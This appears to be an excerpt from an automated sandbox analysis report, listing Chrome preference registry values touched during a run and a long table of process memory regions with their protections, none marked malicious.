||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 37 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
215ED769000
|
heap
|
page read and write
|
|
|
|
215ED874000
|
heap
|
page read and write
|
|
|
|
215ED760000
|
heap
|
page read and write
|
|
|
|
1BF3A39A000
|
heap
|
page read and write
|
||
|
1BF3A1A0000
|
remote allocation
|
page read and write
|
||
|
1C75745E000
|
heap
|
page read and write
|
||
|
16FC468E000
|
heap
|
page read and write
|
||
|
1BF4CF02000
|
heap
|
page read and write
|
||
|
16FC9DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B81F610000
|
heap
|
page read and write
|
||
|
5025A7E000
|
stack
|
page read and write
|
||
|
1E80E7A0000
|
trusted library allocation
|
page read and write
|
||
|
1185CCC3000
|
heap
|
page read and write
|
||
|
1BF3A38C000
|
heap
|
page read and write
|
||
|
75D157F000
|
stack
|
page read and write
|
||
|
1D075361000
|
heap
|
page read and write
|
||
|
3EE7FC000
|
stack
|
page read and write
|
||
|
1BF4CE65000
|
heap
|
page read and write
|
||
|
18A96300000
|
heap
|
page read and write
|
||
|
16FC9CB0000
|
trusted library allocation
|
page read and write
|
||
|
1BF39AEA000
|
heap
|
page read and write
|
||
|
1703C7B000
|
stack
|
page read and write
|
||
|
1B81F813000
|
heap
|
page read and write
|
||
|
46BC8FF000
|
stack
|
page read and write
|
||
|
215ED84D000
|
heap
|
page read and write
|
||
|
16FC5730000
|
trusted library section
|
page readonly
|
||
|
1BF3A3AB000
|
heap
|
page read and write
|
||
|
1BF3A3AE000
|
heap
|
page read and write
|
||
|
1C91D9F0000
|
heap
|
page read and write
|
||
|
1BF3A374000
|
heap
|
page read and write
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
361A27E000
|
stack
|
page read and write
|
||
|
19675E02000
|
trusted library allocation
|
page read and write
|
||
|
1C91DA01000
|
heap
|
page read and write
|
||
|
19B9885A000
|
heap
|
page read and write
|
||
|
1185CCC9000
|
heap
|
page read and write
|
||
|
1D075500000
|
trusted library allocation
|
page read and write
|
||
|
1BF39AEB000
|
heap
|
page read and write
|
||
|
215ED838000
|
heap
|
page read and write
|
||
|
19B98855000
|
heap
|
page read and write
|
||
|
46BC77F000
|
stack
|
page read and write
|
||
|
1BF3A37B000
|
heap
|
page read and write
|
||
|
16FC5740000
|
trusted library section
|
page readonly
|
||
|
1BF39A13000
|
heap
|
page read and write
|
||
|
1C757390000
|
heap
|
page read and write
|
||
|
1C91DA30000
|
heap
|
page read and write
|
||
|
208D9257000
|
heap
|
page read and write
|
||
|
BDAEA7E000
|
stack
|
page read and write
|
||
|
16FC9C90000
|
trusted library allocation
|
page read and write
|
||
|
3EE6FC000
|
stack
|
page read and write
|
||
|
46BCA7F000
|
stack
|
page read and write
|
||
|
1BF3A1A0000
|
remote allocation
|
page read and write
|
||
|
1BF39A5E000
|
heap
|
page read and write
|
||
|
1D07539D000
|
heap
|
page read and write
|
||
|
19B98862000
|
heap
|
page read and write
|
||
|
215ED812000
|
heap
|
page read and write
|
||
|
1C91DBE0000
|
heap
|
page read and write
|
||
|
16FC4702000
|
heap
|
page read and write
|
||
|
1B81F670000
|
heap
|
page read and write
|
||
|
1BF3A37A000
|
heap
|
page read and write
|
||
|
3619CFE000
|
stack
|
page read and write
|
||
|
1BF3A3B0000
|
heap
|
page read and write
|
||
|
19B98885000
|
heap
|
page read and write
|
||
|
A0ACB7A000
|
stack
|
page read and write
|
||
|
19B9886A000
|
heap
|
page read and write
|
||
|
1BF3A37A000
|
heap
|
page read and write
|
||
|
1CB35FF000
|
stack
|
page read and write
|
||
|
16FC4629000
|
heap
|
page read and write
|
||
|
215ED818000
|
heap
|
page read and write
|
||
|
215ED808000
|
heap
|
page read and write
|
||
|
16FC4F18000
|
heap
|
page read and write
|
||
|
1BF4CCF0000
|
heap
|
page read and write
|
||
|
1BF3A390000
|
heap
|
page read and write
|
||
|
16FC9C91000
|
trusted library allocation
|
page read and write
|
||
|
1BF39B16000
|
heap
|
page read and write
|
||
|
16FC46FB000
|
heap
|
page read and write
|
||
|
18A96020000
|
heap
|
page read and write
|
||
|
BDAEBFF000
|
unkown
|
page read and write
|
||
|
1BF39AF9000
|
heap
|
page read and write
|
||
|
208D9040000
|
heap
|
page read and write
|
||
|
5025B7B000
|
stack
|
page read and write
|
||
|
1BF3A803000
|
heap
|
page read and write
|
||
|
16FC4490000
|
heap
|
page read and write
|
||
|
A0AC76B000
|
stack
|
page read and write
|
||
|
3EE3FE000
|
stack
|
page read and write
|
||
|
1C757413000
|
heap
|
page read and write
|
||
|
16FC9E89000
|
heap
|
page read and write
|
||
|
1C757480000
|
heap
|
page read and write
|
||
|
16FC9F02000
|
heap
|
page read and write
|
||
|
16FC9B80000
|
trusted library allocation
|
page read and write
|
||
|
16FC9C9C000
|
trusted library allocation
|
page read and write
|
||
|
208D9200000
|
heap
|
page read and write
|
||
|
16FC5AC1000
|
trusted library allocation
|
page read and write
|
||
|
16FC45F0000
|
trusted library allocation
|
page read and write
|
||
|
16FC4DA0000
|
trusted library section
|
page read and write
|
||
|
19675700000
|
heap
|
page read and write
|
||
|
16FC9EFF000
|
heap
|
page read and write
|
||
|
1BF3A1A0000
|
remote allocation
|
page read and write
|
||
|
1E80E100000
|
heap
|
page read and write
|
||
|
1BF39A73000
|
heap
|
page read and write
|
||
|
1967563C000
|
heap
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
3619C7B000
|
stack
|
page read and write
|
||
|
46BC277000
|
stack
|
page read and write
|
||
|
1BF39A63000
|
heap
|
page read and write
|
||
|
1CB347E000
|
stack
|
page read and write
|
||
|
3EE5FF000
|
stack
|
page read and write
|
||
|
16FC44F0000
|
heap
|
page read and write
|
||
|
215ED7FC000
|
heap
|
page read and write
|
||
|
1D075340000
|
trusted library allocation
|
page read and write
|
||
|
1B81F902000
|
heap
|
page read and write
|
||
|
1D0754E0000
|
heap
|
page readonly
|
||
|
19675629000
|
heap
|
page read and write
|
||
|
A94D2FE000
|
stack
|
page read and write
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
215ED7A0000
|
heap
|
page read and write
|
||
|
1B81F7A0000
|
remote allocation
|
page read and write
|
||
|
1BF3A3A4000
|
heap
|
page read and write
|
||
|
1BF4CE58000
|
heap
|
page read and write
|
||
|
1B820002000
|
trusted library allocation
|
page read and write
|
||
|
1C91DCC5000
|
heap
|
page read and write
|
||
|
1D0755A0000
|
trusted library allocation
|
page read and write
|
||
|
1C757454000
|
heap
|
page read and write
|
||
|
1CB31DF000
|
stack
|
page read and write
|
||
|
1BF3A361000
|
heap
|
page read and write
|
||
|
1185CD13000
|
heap
|
page read and write
|
||
|
1BF3A394000
|
heap
|
page read and write
|
||
|
16FC9F1F000
|
heap
|
page read and write
|
||
|
1185CC29000
|
heap
|
page read and write
|
||
|
1D075150000
|
heap
|
page read and write
|
||
|
1BF4CF13000
|
heap
|
page read and write
|
||
|
A0ACCFF000
|
stack
|
page read and write
|
||
|
19675681000
|
heap
|
page read and write
|
||
|
16FC4E02000
|
heap
|
page read and write
|
||
|
5025D77000
|
stack
|
page read and write
|
||
|
16FC4F13000
|
heap
|
page read and write
|
||
|
215EF080000
|
heap
|
page read and write
|
||
|
16FC4713000
|
heap
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
16FC9DE0000
|
trusted library allocation
|
page read and write
|
||
|
1C91DA16000
|
heap
|
page read and write
|
||
|
17037FC000
|
stack
|
page read and write
|
||
|
16FC9B00000
|
trusted library allocation
|
page read and write
|
||
|
1B81F82A000
|
heap
|
page read and write
|
||
|
19B98829000
|
heap
|
page read and write
|
||
|
1185CC3E000
|
heap
|
page read and write
|
||
|
1CB315A000
|
stack
|
page read and write
|
||
|
1BF3A374000
|
heap
|
page read and write
|
||
|
1185CC87000
|
heap
|
page read and write
|
||
|
16FC4F18000
|
heap
|
page read and write
|
||
|
1BF39B02000
|
heap
|
page read and write
|
||
|
BDAE977000
|
stack
|
page read and write
|
||
|
1BF39AA9000
|
heap
|
page read and write
|
||
|
208D9313000
|
heap
|
page read and write
|
||
|
17033AB000
|
stack
|
page read and write
|
||
|
1E80E013000
|
heap
|
page read and write
|
||
|
3514A7B000
|
stack
|
page read and write
|
||
|
1BF4CE65000
|
heap
|
page read and write
|
||
|
1CB3579000
|
stack
|
page read and write
|
||
|
16FC465D000
|
heap
|
page read and write
|
||
|
75D15FE000
|
stack
|
page read and write
|
||
|
19B9886E000
|
heap
|
page read and write
|
||
|
361A37F000
|
stack
|
page read and write
|
||
|
18A97C02000
|
trusted library allocation
|
page read and write
|
||
|
16FC5640000
|
trusted library allocation
|
page read and write
|
||
|
3EE07B000
|
stack
|
page read and write
|
||
|
1BF3A3AD000
|
heap
|
page read and write
|
||
|
19675430000
|
heap
|
page read and write
|
||
|
16FC9B70000
|
trusted library allocation
|
page read and write
|
||
|
502574B000
|
stack
|
page read and write
|
||
|
A0AD3FF000
|
stack
|
page read and write
|
||
|
19B98858000
|
heap
|
page read and write
|
||
|
1BF39840000
|
heap
|
page read and write
|
||
|
16FCA000000
|
trusted library allocation
|
page read and write
|
||
|
16FC9EA1000
|
heap
|
page read and write
|
||
|
16FC4FDB000
|
heap
|
page read and write
|
||
|
1D075550000
|
trusted library allocation
|
page read and write
|
||
|
1BF3A39A000
|
heap
|
page read and write
|
||
|
BDAE877000
|
stack
|
page read and write
|
||
|
16FC9CC0000
|
trusted library allocation
|
page read and write
|
||
|
16FC9C9E000
|
trusted library allocation
|
page read and write
|
||
|
1BF3A377000
|
heap
|
page read and write
|
||
|
18A9623D000
|
heap
|
page read and write
|
||
|
1BF3A379000
|
heap
|
page read and write
|
||
|
1B81F800000
|
heap
|
page read and write
|
||
|
1BF3A819000
|
heap
|
page read and write
|
||
|
75D1879000
|
stack
|
page read and write
|
||
|
1BF39A49000
|
heap
|
page read and write
|
||
|
1E80E028000
|
heap
|
page read and write
|
||
|
1E80DEA0000
|
heap
|
page read and write
|
||
|
1BF4CE2A000
|
heap
|
page read and write
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
18A96213000
|
heap
|
page read and write
|
||
|
18A961A0000
|
trusted library allocation
|
page read and write
|
||
|
1BF4CF00000
|
heap
|
page read and write
|
||
|
1BF3A388000
|
heap
|
page read and write
|
||
|
1BF4D602000
|
trusted library allocation
|
page read and write
|
||
|
208D9277000
|
heap
|
page read and write
|
||
|
1BF3A202000
|
heap
|
page read and write
|
||
|
18A96302000
|
heap
|
page read and write
|
||
|
1BF39A6E000
|
heap
|
page read and write
|
||
|
1BF3A39E000
|
heap
|
page read and write
|
||
|
1D075396000
|
heap
|
page read and write
|
||
|
3514FFF000
|
stack
|
page read and write
|
||
|
1BF4CF08000
|
heap
|
page read and write
|
||
|
1D675FF000
|
stack
|
page read and write
|
||
|
A0ACFFD000
|
stack
|
page read and write
|
||
|
1BF3A380000
|
heap
|
page read and write
|
||
|
1BF3A3B3000
|
heap
|
page read and write
|
||
|
1BF4CE52000
|
heap
|
page read and write
|
||
|
16FC9DA0000
|
trusted library allocation
|
page read and write
|
||
|
16FC4F9B000
|
heap
|
page read and write
|
||
|
18A96248000
|
heap
|
page read and write
|
||
|
1BF3A39B000
|
heap
|
page read and write
|
||
|
16FC9E2A000
|
heap
|
page read and write
|
||
|
208D9202000
|
heap
|
page read and write
|
||
|
1BF39A29000
|
heap
|
page read and write
|
||
|
19B9885C000
|
heap
|
page read and write
|
||
|
1BF397E0000
|
heap
|
page read and write
|
||
|
1C757E02000
|
trusted library allocation
|
page read and write
|
||
|
1D6717E000
|
stack
|
page read and write
|
||
|
1C75746E000
|
heap
|
page read and write
|
||
|
16FC9CD0000
|
trusted library allocation
|
page read and write
|
||
|
9AB0F7B000
|
stack
|
page read and write
|
||
|
18A96266000
|
heap
|
page read and write
|
||
|
1BF3A389000
|
heap
|
page read and write
|
||
|
1BF3A392000
|
heap
|
page read and write
|
||
|
1185CCBB000
|
heap
|
page read and write
|
||
|
1E80E058000
|
heap
|
page read and write
|
||
|
1C91DA06000
|
heap
|
page read and write
|
||
|
16FC9F03000
|
heap
|
page read and write
|
||
|
A94D27E000
|
stack
|
page read and write
|
||
|
1BF4CE4C000
|
heap
|
page read and write
|
||
|
1C7573F0000
|
heap
|
page read and write
|
||
|
1D075395000
|
heap
|
page read and write
|
||
|
1E80E102000
|
heap
|
page read and write
|
||
|
3514D7C000
|
stack
|
page read and write
|
||
|
16FC9C90000
|
trusted library allocation
|
page read and write
|
||
|
215ED7B3000
|
heap
|
page read and write
|
||
|
BDAE77B000
|
stack
|
page read and write
|
||
|
1703E7F000
|
stack
|
page read and write
|
||
|
19B98857000
|
heap
|
page read and write
|
||
|
18A961D0000
|
remote allocation
|
page read and write
|
||
|
19B98840000
|
heap
|
page read and write
|
||
|
1E80DF00000
|
heap
|
page read and write
|
||
|
46BC47A000
|
stack
|
page read and write
|
||
|
16FC4E00000
|
heap
|
page read and write
|
||
|
1E80E05E000
|
heap
|
page read and write
|
||
|
19B98841000
|
heap
|
page read and write
|
||
|
1B81F836000
|
heap
|
page read and write
|
||
|
1BF4CE02000
|
heap
|
page read and write
|
||
|
18A96313000
|
heap
|
page read and write
|
||
|
1CB367C000
|
stack
|
page read and write
|
||
|
1C75743C000
|
heap
|
page read and write
|
||
|
1BF3A371000
|
heap
|
page read and write
|
||
|
19B98760000
|
heap
|
page read and write
|
||
|
18A96258000
|
heap
|
page read and write
|
||
|
1BF3A39A000
|
heap
|
page read and write
|
||
|
16FC9DE0000
|
trusted library allocation
|
page read and write
|
||
|
1B81F802000
|
heap
|
page read and write
|
||
|
16FC5770000
|
trusted library section
|
page readonly
|
||
|
A94CDD9000
|
stack
|
page read and write
|
||
|
1967565F000
|
heap
|
page read and write
|
||
|
16FC4F18000
|
heap
|
page read and write
|
||
|
19B98859000
|
heap
|
page read and write
|
||
|
1BF39A68000
|
heap
|
page read and write
|
||
|
1BF3A38D000
|
heap
|
page read and write
|
||
|
1B81F7A0000
|
remote allocation
|
page read and write
|
||
|
18A96249000
|
heap
|
page read and write
|
||
|
1BF3A3B0000
|
heap
|
page read and write
|
||
|
19675490000
|
heap
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
A94D37F000
|
stack
|
page read and write
|
||
|
215EF5F0000
|
heap
|
page read and write
|
||
|
3EE9FC000
|
stack
|
page read and write
|
||
|
1BF39A00000
|
heap
|
page read and write
|
||
|
1185CC6E000
|
heap
|
page read and write
|
||
|
46227F000
|
stack
|
page read and write
|
||
|
19675677000
|
heap
|
page read and write
|
||
|
1D672FE000
|
stack
|
page read and write
|
||
|
1BF4CE6A000
|
heap
|
page read and write
|
||
|
1D0753BE000
|
heap
|
page read and write
|
||
|
361A077000
|
stack
|
page read and write
|
||
|
1BF3A3AB000
|
heap
|
page read and write
|
||
|
1BF3A370000
|
heap
|
page read and write
|
||
|
16FC4F59000
|
heap
|
page read and write
|
||
|
BDAE67E000
|
stack
|
page read and write
|
||
|
16FC4E15000
|
heap
|
page read and write
|
||
|
16FC4653000
|
heap
|
page read and write
|
||
|
1BF3A3A0000
|
heap
|
page read and write
|
||
|
208D925A000
|
heap
|
page read and write
|
||
|
1BF3A389000
|
heap
|
page read and write
|
||
|
1BF3A392000
|
heap
|
page read and write
|
||
|
1BF4CE00000
|
heap
|
page read and write
|
||
|
16FC9EF5000
|
heap
|
page read and write
|
||
|
19B9887B000
|
heap
|
page read and write
|
||
|
1BF4CDF0000
|
trusted library allocation
|
page read and write
|
||
|
1BF3A35A000
|
heap
|
page read and write
|
||
|
1C757513000
|
heap
|
page read and write
|
||
|
215EF0A0000
|
heap
|
page read and write
|
||
|
75D1A79000
|
stack
|
page read and write
|
||
|
1BF4CC90000
|
heap
|
page read and write
|
||
|
19675708000
|
heap
|
page read and write
|
||
|
1BF3A383000
|
heap
|
page read and write
|
||
|
1BF39AAA000
|
heap
|
page read and write
|
||
|
19B987C0000
|
heap
|
page read and write
|
||
|
3619F7B000
|
stack
|
page read and write
|
||
|
1D670FE000
|
stack
|
page read and write
|
||
|
1BF39AB3000
|
heap
|
page read and write
|
||
|
1BF3A800000
|
heap
|
page read and write
|
||
|
16FC9CC0000
|
trusted library allocation
|
page read and write
|
||
|
75D18F9000
|
stack
|
page read and write
|
||
|
16FC9E1C000
|
heap
|
page read and write
|
||
|
170397F000
|
stack
|
page read and write
|
||
|
208D9275000
|
heap
|
page read and write
|
||
|
16FC5AF0000
|
trusted library allocation
|
page read and write
|
||
|
16FC9CB4000
|
trusted library allocation
|
page read and write
|
||
|
16FC4F18000
|
heap
|
page read and write
|
||
|
215ED809000
|
heap
|
page read and write
|
||
|
19B99202000
|
trusted library allocation
|
page read and write
|
||
|
19675659000
|
heap
|
page read and write
|
||
|
1BF3A39B000
|
heap
|
page read and write
|
||
|
1BF39ACA000
|
heap
|
page read and write
|
||
|
18A96259000
|
heap
|
page read and write
|
||
|
1B81F840000
|
heap
|
page read and write
|
||
|
1D0754F0000
|
trusted library allocation
|
page read and write
|
||
|
215ED800000
|
heap
|
page read and write
|
||
|
215EF5B0000
|
heap
|
page read and write
|
||
|
1BF3A3BD000
|
heap
|
page read and write
|
||
|
9AB11FE000
|
stack
|
page read and write
|
||
|
46BCCFA000
|
stack
|
page read and write
|
||
|
19B9887F000
|
heap
|
page read and write
|
||
|
19675613000
|
heap
|
page read and write
|
||
|
1BF3A3BD000
|
heap
|
page read and write
|
||
|
18A96249000
|
heap
|
page read and write
|
||
|
3514F7D000
|
stack
|
page read and write
|
||
|
3514E7E000
|
stack
|
page read and write
|
||
|
1BF3A34B000
|
heap
|
page read and write
|
||
|
16FC4600000
|
heap
|
page read and write
|
||
|
46207E000
|
stack
|
page read and write
|
||
|
1BF3A389000
|
heap
|
page read and write
|
||
|
1703F7D000
|
stack
|
page read and write
|
||
|
1185CB30000
|
heap
|
page read and write
|
||
|
1BF3A31D000
|
heap
|
page read and write
|
||
|
16FC9C95000
|
trusted library allocation
|
page read and write
|
||
|
1BF4CC80000
|
heap
|
page read and write
|
||
|
16FCB000000
|
heap
|
page read and write
|
||
|
16FC5720000
|
trusted library section
|
page readonly
|
||
|
1C757380000
|
heap
|
page read and write
|
||
|
1BF39A5C000
|
heap
|
page read and write
|
||
|
16FC4613000
|
heap
|
page read and write
|
||
|
1D6707C000
|
stack
|
page read and write
|
||
|
9AB0C7B000
|
stack
|
page read and write
|
||
|
208D9250000
|
heap
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
18A961D0000
|
remote allocation
|
page read and write
|
||
|
19B98860000
|
heap
|
page read and write
|
||
|
1185CCE1000
|
heap
|
page read and write
|
||
|
19675420000
|
heap
|
page read and write
|
||
|
215ED84D000
|
heap
|
page read and write
|
||
|
1BF39AC4000
|
heap
|
page read and write
|
||
|
19B98867000
|
heap
|
page read and write
|
||
|
1BF39A5B000
|
heap
|
page read and write
|
||
|
46BC07C000
|
stack
|
page read and write
|
||
|
1E80E07A000
|
heap
|
page read and write
|
||
|
16FC9C9A000
|
trusted library allocation
|
page read and write
|
||
|
16FC9E13000
|
heap
|
page read and write
|
||
|
19B9883D000
|
heap
|
page read and write
|
||
|
215ED5F0000
|
heap
|
page read and write
|
||
|
19B98878000
|
heap
|
page read and write
|
||
|
1BF3A3AB000
|
heap
|
page read and write
|
||
|
46BC67B000
|
stack
|
page read and write
|
||
|
462577000
|
stack
|
page read and write
|
||
|
1D07539D000
|
heap
|
page read and write
|
||
|
1D075330000
|
trusted library allocation
|
page read and write
|
||
|
19B98842000
|
heap
|
page read and write
|
||
|
1703A7E000
|
stack
|
page read and write
|
||
|
1185D602000
|
heap
|
page read and write
|
||
|
46BC57E000
|
stack
|
page read and write
|
||
|
16FC4480000
|
heap
|
page read and write
|
||
|
16FC9E48000
|
heap
|
page read and write
|
||
|
1C757C90000
|
trusted library allocation
|
page read and write
|
||
|
19675664000
|
heap
|
page read and write
|
||
|
16FC4F18000
|
heap
|
page read and write
|
||
|
16FC5750000
|
trusted library section
|
page readonly
|
||
|
1BF3A38B000
|
heap
|
page read and write
|
||
|
16FC5400000
|
trusted library allocation
|
page read and write
|
||
|
19675702000
|
heap
|
page read and write
|
||
|
16FC9AF0000
|
trusted library allocation
|
page read and write
|
||
|
1BF3A376000
|
heap
|
page read and write
|
||
|
1BF3A389000
|
heap
|
page read and write
|
||
|
1B81F770000
|
trusted library allocation
|
page read and write
|
||
|
46BCB7A000
|
stack
|
page read and write
|
||
|
1C757500000
|
heap
|
page read and write
|
||
|
46BC6FF000
|
stack
|
page read and write
|
||
|
16FC9F02000
|
heap
|
page read and write
|
||
|
3619D7E000
|
stack
|
page read and write
|
||
|
1C757464000
|
heap
|
page read and write
|
||
|
1BF3A3A0000
|
heap
|
page read and write
|
||
|
1D075599000
|
heap
|
page read and write
|
||
|
1BF3A3AE000
|
heap
|
page read and write
|
||
|
1C91DA14000
|
heap
|
page read and write
|
||
|
46277F000
|
stack
|
page read and write
|
||
|
1BF3A378000
|
heap
|
page read and write
|
||
|
1185CD02000
|
heap
|
page read and write
|
||
|
19B9887C000
|
heap
|
page read and write
|
||
|
1185D700000
|
heap
|
page read and write
|
||
|
1C91DA20000
|
heap
|
page read and write
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
16FCA120000
|
trusted library allocation
|
page read and write
|
||
|
5025C7B000
|
stack
|
page read and write
|
||
|
46267F000
|
stack
|
page read and write
|
||
|
1BF3A350000
|
heap
|
page read and write
|
||
|
208D9030000
|
heap
|
page read and write
|
||
|
46BCEFF000
|
stack
|
page read and write
|
||
|
16FC9C96000
|
trusted library allocation
|
page read and write
|
||
|
1C91D980000
|
heap
|
page read and write
|
||
|
1D076090000
|
trusted library allocation
|
page read and write
|
||
|
16FC9CB1000
|
trusted library allocation
|
page read and write
|
||
|
16FC5AE0000
|
trusted library allocation
|
page read and write
|
||
|
16FC9DF0000
|
remote allocation
|
page read and write
|
||
|
1D0754D0000
|
trusted library allocation
|
page read and write
|
||
|
1BF4CE72000
|
heap
|
page read and write
|
||
|
1BF4CE3C000
|
heap
|
page read and write
|
||
|
1E80E000000
|
heap
|
page read and write
|
||
|
1C75748A000
|
heap
|
page read and write
|
||
|
16FC4725000
|
heap
|
page read and write
|
||
|
A94D1FE000
|
stack
|
page read and write
|
||
|
208D9224000
|
heap
|
page read and write
|
||
|
46BC37D000
|
stack
|
page read and write
|
||
|
1D075590000
|
heap
|
page read and write
|
||
|
1BF3A389000
|
heap
|
page read and write
|
||
|
16FC46B9000
|
heap
|
page read and write
|
||
|
1BF3A3BF000
|
heap
|
page read and write
|
||
|
16FC4F59000
|
heap
|
page read and write
|
||
|
1E80E078000
|
heap
|
page read and write
|
||
|
1D674FE000
|
stack
|
page read and write
|
||
|
215ED839000
|
heap
|
page read and write
|
||
|
1C91DA20000
|
heap
|
page read and write
|
||
|
18A96259000
|
heap
|
page read and write
|
||
|
18A96318000
|
heap
|
page read and write
|
||
|
19B987F0000
|
trusted library allocation
|
page read and write
|
||
|
16FC9B30000
|
trusted library allocation
|
page read and write
|
||
|
16FC463D000
|
heap
|
page read and write
|
||
|
19675655000
|
heap
|
page read and write
|
||
|
19B98856000
|
heap
|
page read and write
|
||
|
1BF3A3DB000
|
heap
|
page read and write
|
||
|
3EE4FE000
|
stack
|
page read and write
|
||
|
1D075320000
|
trusted library allocation
|
page read and write
|
||
|
1BF397D0000
|
heap
|
page read and write
|
||
|
19B98861000
|
heap
|
page read and write
|
||
|
16FC9D60000
|
trusted library allocation
|
page read and write
|
||
|
1C757502000
|
heap
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
19675713000
|
heap
|
page read and write
|
||
|
50257CD000
|
stack
|
page read and write
|
||
|
1B81F600000
|
heap
|
page read and write
|
||
|
5025F7D000
|
stack
|
page read and write
|
||
|
16FC9EF4000
|
heap
|
page read and write
|
||
|
1BF3A803000
|
heap
|
page read and write
|
||
|
1BF3A3D3000
|
heap
|
page read and write
|
||
|
4620FE000
|
stack
|
page read and write
|
||
|
19B9885F000
|
heap
|
page read and write
|
||
|
215F28B0000
|
trusted library allocation
|
page read and write
|
||
|
16FC9EF0000
|
heap
|
page read and write
|
||
|
1BF4CE8C000
|
heap
|
page read and write
|
||
|
A0AD4FF000
|
stack
|
page read and write
|
||
|
A0AD0FF000
|
stack
|
page read and write
|
||
|
75D197F000
|
stack
|
page read and write
|
||
|
1185CBC0000
|
trusted library allocation
|
page read and write
|
||
|
46BCBFE000
|
stack
|
page read and write
|
||
|
3514BFF000
|
stack
|
page read and write
|
||
|
16FC9EA3000
|
heap
|
page read and write
|
||
|
208D9302000
|
heap
|
page read and write
|
||
|
215ED870000
|
heap
|
page read and write
|
||
|
16FC9DD0000
|
trusted library allocation
|
page read and write
|
||
|
BDAECF8000
|
stack
|
page read and write
|
||
|
16FC9C98000
|
trusted library allocation
|
page read and write
|
||
|
16FC4662000
|
heap
|
page read and write
|
||
|
1BF39A66000
|
heap
|
page read and write
|
||
|
1BF4CE6A000
|
heap
|
page read and write
|
||
|
A0AD1FE000
|
stack
|
page read and write
|
||
|
16FC4624000
|
heap
|
page read and write
|
||
|
1C91DA20000
|
heap
|
page read and write
|
||
|
1D075290000
|
heap
|
page read and write
|
||
|
1BF4CE13000
|
heap
|
page read and write
|
||
|
18A96010000
|
heap
|
page read and write
|
||
|
18A97E00000
|
trusted library allocation
|
page read and write
|
||
|
461DFB000
|
stack
|
page read and write
|
||
|
1BF3A300000
|
heap
|
page read and write
|
||
|
A94D3FF000
|
stack
|
page read and write
|
||
|
1703AFC000
|
stack
|
page read and write
|
||
|
502607E000
|
stack
|
page read and write
|
||
|
215ED805000
|
heap
|
page read and write
|
||
|
1BF39A64000
|
heap
|
page read and write
|
||
|
16FC4667000
|
heap
|
page read and write
|
||
|
19B98800000
|
heap
|
page read and write
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
1967565D000
|
heap
|
page read and write
|
||
|
3619E7B000
|
stack
|
page read and write
|
||
|
1BF39B08000
|
heap
|
page read and write
|
||
|
1E80E802000
|
trusted library allocation
|
page read and write
|
||
|
361A17C000
|
stack
|
page read and write
|
||
|
18A9628A000
|
heap
|
page read and write
|
||
|
35150FD000
|
stack
|
page read and write
|
||
|
1BF3A35C000
|
heap
|
page read and write
|
||
|
18A97BA0000
|
trusted library allocation
|
page read and write
|
||
|
1C75746E000
|
heap
|
page read and write
|
||
|
1BF3A39A000
|
heap
|
page read and write
|
||
|
19B98813000
|
heap
|
page read and write
|
||
|
215ED87E000
|
heap
|
page read and write
|
||
|
19675600000
|
heap
|
page read and write
|
||
|
19675590000
|
trusted library allocation
|
page read and write
|
||
|
1E80E040000
|
heap
|
page read and write
|
||
|
46BC7FE000
|
stack
|
page read and write
|
||
|
19B98750000
|
heap
|
page read and write
|
||
|
9AB107B000
|
stack
|
page read and write
|
||
|
16FC4665000
|
heap
|
page read and write
|
||
|
16FC9CD4000
|
trusted library allocation
|
page read and write
|
||
|
1BF3A38D000
|
heap
|
page read and write
|
||
|
16FC469B000
|
heap
|
page read and write
|
||
|
16FC9DF0000
|
trusted library allocation
|
page read and write
|
||
|
16FC5760000
|
trusted library section
|
page readonly
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
1BF4CE50000
|
heap
|
page read and write
|
||
|
16FC5181000
|
trusted library allocation
|
page read and write
|
||
|
46BCD7D000
|
stack
|
page read and write
|
||
|
